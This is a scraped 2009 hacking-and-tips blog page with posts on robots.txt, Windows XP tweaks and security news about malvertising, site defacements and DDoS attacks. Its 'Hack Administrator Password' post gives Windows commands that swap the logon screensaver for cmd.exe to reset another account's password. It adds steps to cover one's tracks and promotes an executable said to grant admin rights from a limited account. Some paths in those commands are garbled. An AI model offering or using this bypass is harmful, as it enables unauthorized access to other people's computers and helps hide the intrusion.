<div class="post_title"><h2><span id="konasapn0"><span id="konasapn0"><a href="http://hackernepal.blogspot.com/2009/10/website-name-in-every-search-engine.html">5. WEBSITE NAME IN EVERY SEARCH ENGINE</a> </span></span></h2></div><div class="post_date"><span id="konasapn0"><span id="konasapn0"> 8:07 PM | By hang </span></span><br />
</div><span id="konasapn0"><span id="konasapn0"><b>HIS IS THE TRICK FOR THOSE WHOSE SITES ARE NOT CRAWLED IN GOOGLE OR ANY OTHER <b style="background-color: #ffff66;">SEARCH</b> <b style="background-color: #a0ffff;">ENGINE</b>.<br />
<br />
<br />
FIRST OF ALL YOU SHOULD HAVE <span style="color: red;">ROBOTS.TXT</span> IN YOUR MAIN SITE DATABASE USING ANY FTP PROGRAM OR FILEZILLA SO THE <b style="background-color: #ffff66;">SEARCH</b> <b style="background-color: #a0ffff;">ENGINE</b> CAN FIND YOUR SITE..<br />
<br />
<br />
<span style="color: red;">WAHT IS ROBOTS.TXT?</span><br />
<br />
you probably know that when a <b style="background-color: #ffff66;">search</b> <b style="background-color: #a0ffff;">engine</b> spider visits your site,one of the first things it does is look for a file called <span style="color: red;">robots.txt</span><br />
which tells it which files and folders it can go and look at. by defalu,WORDPRESS lets every robot go everywhere.You may restrict some file not to<br />
show in <b style="background-color: #ffff66;">search</b> <b style="background-color: #a0ffff;">engine</b>.<br />
<br />
<br />
it is the file which says <b style="background-color: #ffff66;">search</b> <b style="background-color: #a0ffff;">engine</b> what should be crawled.<br />
<br />
<br />
There are many plugins in wordpress to make <span style="color: red;">robots.txt</span> but you may create it your own<br />
<br />
<br />
copy this text in notepad then save as <span style="color: red;">robots.txt</span><span style="color: #008400;"><br />
User-agent: Googlebot<br />
Disallow: /*.pdf$<br />
Disallow: /*.php$<br />
Disallow: /*.js$<br />
Disallow: /*.cgi$<br />
Disallow: /*.xhtml$<br />
Disallow: /*.php*<br />
Disallow: /*.inc$<br />
Disallow: /*.css$<br />
Disallow: /*?*<br />
Disallow: /wp-*<br />
Disallow: /feed/<br />
Disallow: /trackback/<br />
Disallow: /cgi-bin/<br />
Disallow: /go/<br />
<br />
User-agent:*<br />
Disallow: /wp-content/<br />
Disallow: /wp-content/plugins/<br />
Disallow: /wp-admin/<br />
Disallow: /wp-includes/<br />
Disallow: /wp-<br />
Disallow: /feed/<br />
Disallow: /trackback/<br />
Disallow: /cgi-bin/<br />
<br />
</span><br />
<br />
or you can download the plugin for <a href="javascript:void(0);" onclick="_linkInterstitial('http://wordpress.org/extend/plugins/pc-r\74wbr\76obotstxt/'); return false;" target="_blank">here</a><br />
<br />
NOW,<br />
<br />
next step is to register your site in google.<br />
<br />
goto this address <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.google.com/webmasters/tools/'); return false;" target="_blank">click here</a><br />
<br />
you can also register in yahoo <b style="background-color: #ffff66;">search</b> <b style="background-color: #a0ffff;">engine</b> and many other by going to this <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.scrubtheweb.com/'); return false;" target="_blank">address.</a></b></span></span><br />
<br />
<br />
<br />
<br />
<div class="entry-title" style="color: #990000;"> <h1>Inbound and Outbound Link</h1></div>Linking in a website is very important. A website or blog must have links to another websites or blogs. All the reputed and useful websites have ample numbers of links. Links are two types- inbound link and outbound link. There is another type of link- reciprocal link.<br />
<br />
Inbound link means link from other websites or blog targeted to your blog. Inbound link is the main factor for enlisting in the search engines. Your page rank will be high in different search engines if you get sufficient links from other high ranking websites. The higher the rank, the more traffic. Every web designer should try to get maximum inbound links from another useful and related websites. Outbound link means link from your website to another website. There is a debate over the importance of outbound linking for enlisting in search engines.<br />
<br />
I always try to give link to another important website for relevant information for my visitors. You should be careful when you are going to give a link from your website to another website or blog. The website which is linked from your website must be reputed and useful. Linking to sites outside your own website or blog does mean you end up sending traffic away from your website or blog so you need to count the cost of such a strategy. Too much outbound link may be detrimental for your website. So outbound links should be limited. <br />
<br />
</div><div class="para"><br />
</div><div class="para"><br />
</div></div><span id="konasapn0"><span id="konasapn0"></span></span><br />
</div></div></div></div></div></div></div></div></div></div></td></tr>
</tbody></table><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-83879325211924589402009-10-17T01:03:00.000-07:002009-10-20T01:58:17.992-07:00xp tricks(4)<h1><a href="http://www.blogger.com/goog_1255766549387"><br />
</a></h1><span style="font-size: 12pt;"> <span style="font-size: 18pt;"><b> 1. INSTALL XP WITH IN 10 MINUTESS</b></span><br />
<br />
Here i am going to the secret that i got from another community . I found that we can bypass the 39 minute of time while we are installing windows xp.<br />
<br />
Hope U Will Like IT... <br />
<br />
We all know that after loading the file or copying the file from the boot disk to temporary space the system requires a first time reboot. <br />
<br />
Now if we press shift+f10 then the task manager will open and there we will find that a process is running named setup.exe<br />
<br />
Now our task is to make the priority of this process maxm by right clicking on that. <br />
<br />
We are done.<br />
<br />
Find ur xp installed in 10 min with tolerance 2 min<br />
<br />
Note:if command prompt is get opening use command for task manager</span><br />
<br />
<!-- Menu --> <br />
<div id="menu"> <div class="menu1 section" id="menu1"> </div></div><!-- /Menu --> <!-- Content --> <div id="crosscol-wrapper" style="text-align: center;"> </div><!-- google_ad_section_start(name=default) --> <a href="" name="1717594216268440887"></a> <div class="post_title"> <h2> <a href="http://hackernepal.blogspot.com/2009/10/hack-adminstrator-password-for-windows.html">2. Hack Adminstrator Password For Windows XP</a> </h2></div><div class="post_date"> <span class="post-timestamp"> 8:19 PM </span> | <span class="post-author vcard"> By <span class="fn">hang</span> </span> </div> Hack Adminstrator Password For Windows XP <br />
<!--google_ad_section_end--><!-- google_ad_section_start --> <img align="bottom" alt="hacking administrator password new - XAIN - A RED DEVIL" height="300" src="http://image.wetpaint.com/image/1/zSfIbH61z57Z0BwQEed6wg18845/GW400H300" title="hacking administrator password new - XAIN - A RED DEVIL" width="400" /><br />
<span style="color: red;"><span style="color: blue;"><span style="color: green;"><span style="color: #0066d8;"><span style="font-size: 130%;"></span><br />
<span style="color: black;">This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:<br />
Here are the steps involved to Hack the Window XP Administrator Password .<br />
<br />
Go to Start –> Run –> Type in CMD<br />
You will get a command prompt. Enter these commands the way it is given<br />
cd<br />
cd windowssystem32<br />
mkdir temphack<br />
copy logon.scr temphacklogon.scr<br />
copy cmd.exe temphackcmd.exe<br />
del logon.scr<br />
rename cmd.exe logon.scr<br />
exit<br />
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password<br />
A Brief explanation of what you are currently doing here is<br />
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.<br />
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command<br />
net user password<br />
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command<br />
net user clazh pass<br />
This will chang the admin password to pass.<br />
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.<br />
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.<br />
Go to Start –> Run –> Type in CMD<br />
You will get a command prompt. Enter these commands the way it is given<br />
cd<br />
cd windowssystem32temphack<br />
copy logon.scr C:windowssystem32logon.scr<br />
copy cmd.exe C:windowssystem32cmd.exe<br />
exit<br />
Or simply go to C:windowssystem32temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.<br />
Via internetbusinessdaily.net<br />
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.<br />
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.<br />
Update: The above Method only works if the system is FAT/FAT32 - because of the updated “user rights management” in NTFS - file level rights etc. This does not work on a system using NTFS<br />
Or Hack Adminstrator Password For Windows XP using this software, this softwares make you administrator on a windows xp computer if you do not have admin password.<br />
<br />
Only 1.1 MB<br />
If you aren`t Admin user<br />
HACK Admin Password for Windows XP<br />
From Limited Account XP<br />
&<br />
Become Admin Of Windows Xp<br />
Tested & worked<br />
<br />
</span></span></span></span></span><span style="color: red;"><span style="color: blue;"><span style="color: green;"><span style="color: #0066d8;"><span style="color: black;">Unzip & Run accmaker.exe in windows XP.(no problem if you are guest or Limited user (No admin),Now You are admin,log off & enter XP with your admin account with </span></span></span></span></span><br />
<br />
<h2 class="post-title"><br />
3. How to Lock the folders</h2>You can lock and unlock your folder with this simple trick !<br />
<span style="color: red; font-weight: bold;">Procedure :<br />
</span>1. Make a folder on the desktop and name it as “folder”<br />
2. Now, open notepad and write <span style="color: red;">ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} </span>and now (Notepad Menu) File>save as.<br />
3. In the ’save as’ name it as <span style="color: #009900; font-weight: bold;">lock.bat</span> and click save ! (Save it on Desktop)<br />
4. Now, again open notepad again and write <span style="color: red;">ren</span> <span style="color: red;">folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder </span>and now (Notepad Menu) File>save as.<br />
5. In the ’save as’ name it as <span style="color: #009900; font-weight: bold;">key.bat</span> and click save ! (Save it on Desktop)<br />
6. Now, double click <span style="color: #009900; font-weight: bold;">lock.bat </span>to lock the folder and now if you open your folder, control panel will open up !<br />
7. Now, double click <span style="color: #009900; font-weight: bold;">key.bat </span>to open the folder and now if you open your folder, you can access your data inside the folder again !<br />
8. Lock your folder and hide the <span style="color: #009900; font-weight: bold;">key.bat </span>somewhere else on your hard disk !<br />
9. Whenever you want to open your folder just paste the <span style="color: #009900; font-weight: bold;">key.bat </span>on desktop and open your folder using it !<br />
<br />
<br />
<div id="crosscol-wrapper" style="text-align: center;"> </div><!-- google_ad_section_start(name=default) --> <a href="" name="7920434029031331470"></a> <div class="post_title"> <h2> <a href="http://hackernepal.blogspot.com/2009/10/20-ways-to-improve-win-xp.html">4. 20 ways to improve win xp</a> </h2></div><div class="post_date"> <span class="post-timestamp"> </span><span class="post-author vcard"><span class="fn"><br />
</span> </span> </div>Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.<br />
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.<br />
<br />
2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.<br />
<br />
3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.<br />
<br />
4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.<br />
<br />
The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.<br />
<br />
Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.<br />
<br />
Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.<br />
<br />
5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.<br />
<br />
6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.<br />
<br />
7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.<br />
<br />
8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.<br />
<br />
9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.<br />
<br />
10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.<br />
<br />
11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.<br />
<br />
12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.<br />
<br />
13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.<br />
<br />
14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.<br />
<br />
15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.<br />
<br />
16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.<br />
<br />
17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.<br />
<br />
18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.<br />
<br />
19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.<br />
<br />
20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.<br />
<br />
21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.<br />
<br />
22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.<br />
<br />
23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.<br />
<br />
<br />
Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.<div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-15466732050556567622009-10-06T00:51:00.001-07:002009-10-20T01:53:59.406-07:00hacking news(9)<span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: x-large;">googel server down (20 oct 2009)</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY4n6BzcUvBcvlpalbK7hlcMmdD8dNxeblTbnXm3-2D7mdH3TeY4nHZ4u3Qoi1EY9K4XPN_rnHb7JQGouClZi1Rr7mbFdtn6xqNr_tftdkrwVSpF-oBItuO9I0K-zcpqbrmvAjQ4aYEObO/s1600-h/Untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY4n6BzcUvBcvlpalbK7hlcMmdD8dNxeblTbnXm3-2D7mdH3TeY4nHZ4u3Qoi1EY9K4XPN_rnHb7JQGouClZi1Rr7mbFdtn6xqNr_tftdkrwVSpF-oBItuO9I0K-zcpqbrmvAjQ4aYEObO/s320/Untitled.jpg" width="320" /></a><br />
</div><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: x-large;"> googel server down for 25 minutes today .what happens to google it loses many million doller.</span></span><br />
<span style="color: #cc0000; font-size: large;">1. Multiple Popular Websites Affected By EyeWonder Malware Incident </span><br />
according to ZDNet, during the last couple of hours, visitors of popular and high trafficked web sites such as CNN, BBC, Washington Post, Gamespot, WorldOfWarcraft, Mashable, Chow.com, ITpro.co.uk, AndroidCommunity, Engadget and Chip.de, started reporting that parts of the web sites are unreachable due to malware warnings appearing through the EyeWonder interactive digital advertising provider.<br />
<br />
According to Google’s SafeBrowsing advisory for EyeWonder, the exploits were hosted on currently active and participating in the Cold Fusion injection attack domains, namely elfah .net, 2ici .cn and javazhu.3322 .org - the following have also managed to compromise Pakistan’s Telecommunication Authority.<br />
<br />
By using RealPlayer Import stack overflow exploit and another one attempting a QVOD Player URL overflow, the cybercriminals then attempt to push eight different malware samples. Detection rates for the droppers are improving.<br />
<br />
Interestingly, one of the malware samples attemps to download the updated list of malware binaries by connecting a compromised Italian site part of the Cold Fusion injection attacks (betheboss.it) since it appears to have been exploited in such a way.<br />
<br />
This malware incident demonstrates how a single exploitation of a trusted third-party content/ad serving vendor can not only undermine its credibility, but potentially the credibility of the sites using the network. And since the ads on the affected sites are dynamically served through different networks, it remains questionable whether it was in fact EyeWonder that served malicious content, or a compromised partner of the network itself.<br />
<br />
Case in point - the partnership between Facilitate Digital and EyeWonder comes in a very insecure fashion with EyeWonder having a permanent iFrame tag loading a domain (adsfac.us) belonging to Facilitate Digital on its front page.<br />
<br />
For the time being, EyeWonder.com remains down for maintenance.<br />
<br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/nepali.html">2. nepaliचार सरकारी सहित दर्जनौ नेपाली वेवसाइटहरु ह्याक</a></h2>कम्तीमा चार सरकारी वेवसाईट सहित दर्जनौ नेपाली वेब साइटहरु ह्याकर हरुको फन्दामा परेका छन । ह्ययाकिङ्ग भएका सरकारी वेव साईटहरुमा सयुक्त राष्ट्रसघको सहयोगमा निर्माण हुन लागेको युनाईटेट नेसन्स पार्क को वेव साईट देखी युरोपियन युनियन को सहयोगमा सचालित सिल्क एसोसियसन नेपालको वेव साईट सम्म परेको छ ।<br />
<br />
ह्याकिङ्ग भएका वेव साईटहरुका सर्भरमा नेपाल सरकारको आधिकारिक वेव सर्भर National Information Technology Center (NITC) देखी निजी क्षेत्रवाट सचालित World-Link Communications Inc, EVEREST NET PVT. LTD, आदी नाम चलेका आई एस पी हरुमा पनि परेका छन । ह्याकिङ्ग भएका वेव साईटहरु धेरै चाँही काठमाण्डौको नाम चलेको वेव होष्टिङ्ग तथा डिजाईनिङ्ग गर्ने कम्पनी Radiant InfoTech Nepal (P.) Ltd ले बनाएका परेका छन ।<br />
<br />
ßLacK_Wh!TE, md.r00t, [SiLeNtp0is0n] जस्ता उपनाम भएका ह्याकरहरुको वारेमा विस्तृत विवरण प्राप्त हुन नसके पनि उनिहरुको उदेश्य सर्भरमा प्रवेश गरी महत्वपुर्ण सुचना सकलन गर्नु तथा सम्बन्धित लाई वेव सर्भरको सुरक्षाको वारेमा जानकारी दिनु रहेको देखिन्छ ।<br />
hacked site list<br />
युनाईटेड नेशन्स पार्क<br />
<br />
महिला बालबालिका तथा समाज कल्याण मन्त्रालय<br />
<br />
राष्ट्रिय एडस तथा सरुवा रोग नियन्त्रण केन्द्र<br />
<br />
भक्तपुर ओधोगिक क्षेत्र<br />
<br />
भुकम्पीय सुरक्षा कार्यक्रम<br />
<br />
शहरी विकास तथा भवन निर्माण विभाग<br />
<br />
Nepal Cloth Merchant and Tailoring Association<br />
<br />
Agri-Business and Trade Promotion Multi-Purpose Co-operative (ABTRACO)<br />
<br />
नेपाल खुद्रा ब्यपार सघ<br />
<br />
Silk Association of Nepal<br />
<br />
नेपाल कपडा तथा सिलाई ब्यबसायी सघ<br />
<br />
ईन्फोहव एजुकेशनल कन्सल्टेन्सी<br />
<br />
हिमालयन ह्वाइट हाउस कलेज<br />
<br />
बालाजु ओधोगिक क्षेत्र<br />
<br />
भिडीयो डट कम डट एन पी<br />
<br />
mysansar@anish.com.np<br />
<br />
<br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/nepali-website-in-japan-hacked.html">3.Nepali website in Japan hacked</a></h2>Nepali website in Japan hacked<br />
<br />
The online news site run by the Nepalis in Japan, nepaljapan.com, has been hacked since Saturday because of which the owners said it would remain shut for a few days.<br />
<br />
According to Anunaya Dahal, the administrator of the site, they decided to shut the server down after finding out their site has been hacked on Saturday.<br />
<br />
Dr Kumar Basnet, chief editor of the site, said they hope to resume the service in the next few days for reader's consumption.<br />
<br />
Nepaljapan.com is one of the leading news portal run by Nepali Diaspora in Japan. The hacker has not been tracked <br />
<br />
<br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/multiple-popular-websites-affected-by.html">4. Multiple Popular Websites Affected By EyeWonder Malware Incident</a></h2>according to ZDNet, during the last couple of hours, visitors of popular and high trafficked web sites such as CNN, BBC, Washington Post, Gamespot, WorldOfWarcraft, Mashable, Chow.com, ITpro.co.uk, AndroidCommunity, Engadget and Chip.de, started reporting that parts of the web sites are unreachable due to malware warnings appearing through the EyeWonder interactive digital advertising provider.<br />
<br />
According to Google’s SafeBrowsing advisory for EyeWonder, the exploits were hosted on currently active and participating in the Cold Fusion injection attack domains, namely elfah .net, 2ici .cn and javazhu.3322 .org - the following have also managed to compromise Pakistan’s Telecommunication Authority.<br />
<br />
By using RealPlayer Import stack overflow exploit and another one attempting a QVOD Player URL overflow, the cybercriminals then attempt to push eight different malware samples. Detection rates for the droppers are improving.<br />
<br />
Interestingly, one of the malware samples attemps to download the updated list of malware binaries by connecting a compromised Italian site part of the Cold Fusion injection attacks (betheboss.it) since it appears to have been exploited in such a way.<br />
<br />
This malware incident demonstrates how a single exploitation of a trusted third-party content/ad serving vendor can not only undermine its credibility, but potentially the credibility of the sites using the network. And since the ads on the affected sites are dynamically served through different networks, it remains questionable whether it was in fact EyeWonder that served malicious content, or a compromised partner of the network itself.<br />
<br />
Case in point - the partnership between Facilitate Digital and EyeWonder comes in a very insecure fashion with EyeWonder having a permanent iFrame tag loading a domain (adsfac.us) belonging to Facilitate Digital on its front page.<br />
<br />
For the time being, EyeWonder.com remains down for maintenance. <br />
<br />
<br />
<br />
<script type="text/javascript">
<!--
ch_client = "eblogtemplates";
ch_type = "rpu";
ch_noprice = "1";
ch_shufflequeries = 1;
ch_width = 468;
ch_height = 90;
ch_color_title = "2277DD";
ch_non_contextual = 1;
ch_nosearch = 1 ;
ch_font_title = "Arial";
ch_font_text = "Arial";
ch_sid = "langit-template";
var ch_queries = new Array( );
var ch_selected=Math.floor((Math.random()*ch_queries.length));
if ( ch_selected < ch_queries.length ) {
ch_query = ch_queries[ch_selected];
}
//-->
</script> A sustained cyber-attack against a niche pornography sites has demonstrated a novel way to inflict major damage on hardened targets using a modest amount of data, a security researcher has warned.<br />
<br />
The ongoing attacks on several sites related to transvestite porn work by sending hundreds of thousands of domain name servers a steady stream of packets that contain little more than the character “.” The queries, which are forged so they appear to have been sent from sites such as ladyboydolls.com and triplexbonanza.com, prompt the DNS servers to respond to the targets with a list of the internet’s root servers, responses that contain about eight times more data than the initial request.<br />
<br />
The attacks began in mid January and have used some 750,000 DNS servers to spew about 5Gbps worth of junk response packets at one victim alone, said Phil Rosenthal, CTO of ISPrime, an internet provider for one of the sites being attacked. The company has since been able to mitigate the attack using a variety of methods.<br />
<br />
The technique tricks the net’s authoritative name servers into bombarding innocent victims with more data than they can handle. It is growing increasingly common and it’s likely only a matter of time before commercial attack kits add it to their arsenal, said Don Jackson, a researcher with Atlanta-based security provider SecureWorks. He also warned there is no easy fix because any remedy will potentially require settings for millions of DNS, or domain-name system, servers to be individually changed.<br />
<br />
“The amplifiers in this attack are name servers configured to what is considered best practices,” Jackson told The Register. Preventing the attack will require administrators to make changes to the software running each vulnerable DNS server on the internet, he added.<br />
<br />
The amplification technique exploits an artifact in the net’s DNS from the days when it was considered harmless for a name server to respond to misdirected name queries with the name of a more appropriate server to make the request. Read together, RFCs 1034, 1035 and 1912 call for name servers that are queried for the location of the root servers to honor the request, Jackson and others say.<br />
<br />
“There’s really no reason to tell the requester that information,” said Randal Vaughn, a professor of information systems at Baylor University and an expert in DNS amplification. “The problem is more related to the fact that at one time DNS servers would need to ask each other for help. When name servers started out, there were assumptions made that requests are legitimate, so we’ll answer them.” <br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/ladyboydollscom-website-attacked-by.html">5.Ladyboydolls.com Website Attacked By Recently Discovered Type Of DDoS</a></h2><h2>A<span style="font-size: small;"> sustained cyber-attack against a niche pornography sites has demonstrated a novel way to inflict major damage on hardened targets using a modest amount of data, a security researcher has warned.<br />
<br />
The ongoing attacks on several sites related to transvestite porn work by sending hundreds of thousands of domain name servers a steady stream of packets that contain little more than the character “.” The queries, which are forged so they appear to have been sent from sites such as ladyboydolls.com and triplexbonanza.com, prompt the DNS servers to respond to the targets with a list of the internet’s root servers, responses that contain about eight times more data than the initial request.<br />
<br />
The attacks began in mid January and have used some 750,000 DNS servers to spew about 5Gbps worth of junk response packets at one victim alone, said Phil Rosenthal, CTO of ISPrime, an internet provider for one of the sites being attacked. The company has since been able to mitigate the attack using a variety of methods.<br />
<br />
The technique tricks the net’s authoritative name servers into bombarding innocent victims with more data than they can handle. It is growing increasingly common and it’s likely only a matter of time before commercial attack kits add it to their arsenal, said Don Jackson, a researcher with Atlanta-based security provider SecureWorks. He also warned there is no easy fix because any remedy will potentially require settings for millions of DNS, or domain-name system, servers to be individually changed.<br />
<br />
“The amplifiers in this attack are name servers configured to what is considered best practices,” Jackson told The Register. Preventing the attack will require administrators to make changes to the software running each vulnerable DNS server on the internet, he added.<br />
<br />
The amplification technique exploits an artifact in the net’s DNS from the days when it was considered harmless for a name server to respond to misdirected name queries with the name of a more appropriate server to make the request. Read together, RFCs 1034, 1035 and 1912 call for name servers that are queried for the location of the root servers to honor the request, Jackson and others say.<br />
<br />
“There’s really no reason to tell the requester that information,” said Randal Vaughn, a professor of information systems at Baylor University and an expert in DNS amplification. “The problem is more related to the fact that at one time DNS servers would need to ask each other for help. When name servers started out, there were assumptions made that requests are legitimate, so we’ll answer them.” <br />
</span></h2><h2><a href="http://hackernepal.blogspot.com/2009/10/iranian-opposition-launches-organized.html">6. Iranian Opposition Launches Organized Cyber Attack Against Government Sites</a></h2><h2><span style="font-size: small; font-weight: normal;">The Iranian opposition coordinated a cyber attack yesterday that has successfully managed to disrupt access to major pro-Ahmadinejad Iranian web sites, including the President’s homepage which continues returning a “The maximum number of user reached, Server is too busy, please try again later…” message.<br />
<br />
Through a combination of DIY (do it yourself) denial of service attack tools (DDoS), multiple iFrame loading scripts, public web page “refresher” tool, and a much more effective PHP script, the participants have already prompted some of the major Iranian outlets to switch to “lite” versions of their sites in an attempt to mitigate the attack.<br />
<br />
The campaign appears to have been organized through Twitter, which despite public reports that the site has been banned in Iran, appears to be still accessible through a a persistent supply of proxy servers on behalf of the opposition.<br />
<br />
